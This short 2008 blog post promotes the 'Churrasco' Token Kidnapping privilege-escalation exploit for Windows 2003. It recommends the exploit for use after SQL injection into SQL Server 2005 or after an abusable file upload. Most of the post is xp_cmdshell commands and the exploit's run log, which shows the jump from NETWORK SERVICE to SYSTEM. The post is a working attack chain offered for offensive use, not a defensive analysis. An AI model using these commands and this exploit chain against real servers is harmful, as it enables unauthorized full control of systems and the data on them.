Windows 2003 Token Kidnapping Privilege Escalation

October 18, 2008

In case you haven’t seen this exploit on milw0rm (, its worth having a look. It will be very handy particularly in following 2 instances:

1. SQL injection in SQL Server 2005, with backend server running as ‘SA’.
2. File Upload functionality allowing you to run code.

Its worth noting that SQL server 2005 run as ‘network service’ and thus with ‘sa’ account and with xp_cmdshell enabled, access can only be gained as a restricted user(network service’). The following might help in understanding this better:-

1> exec master..xp_cmdshell ‘whoami’
2> go
—— ——————————–
nt authoritynetwork service

1> exec master..xp_cmdshell ‘C:testChurrasco.exe whoami’
2> go
— — ——————————–
/churrasco/–>Current User: NETWORK SERVICE
/churrasco/–>Getting Rpcss PID …
/churrasco/–>Found Rpcss PID: 732
/churrasco/–>Searching for Rpcss threads …
/churrasco/–>Found Thread: 736
/churrasco/–>Thread not impersonating, looking for another thread…
/churrasco/–>Found Thread: 740
/churrasco/–>Thread not impersonating, looking for another thread…
/churrasco/–>Found Thread: 748
/churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0x72c
/churrasco/–>Getting SYSTEM token from Rpcss Service…
/churrasco/–>Found SYSTEM token 0x724
/churrasco/–>Running command with SYSTEM Token…
/churrasco/–>Done, command should have ran as SYSTEM!
nt authoritysystem
(16 rows affected)


Leave a Reply

Your email address will not be published. Required fields are marked *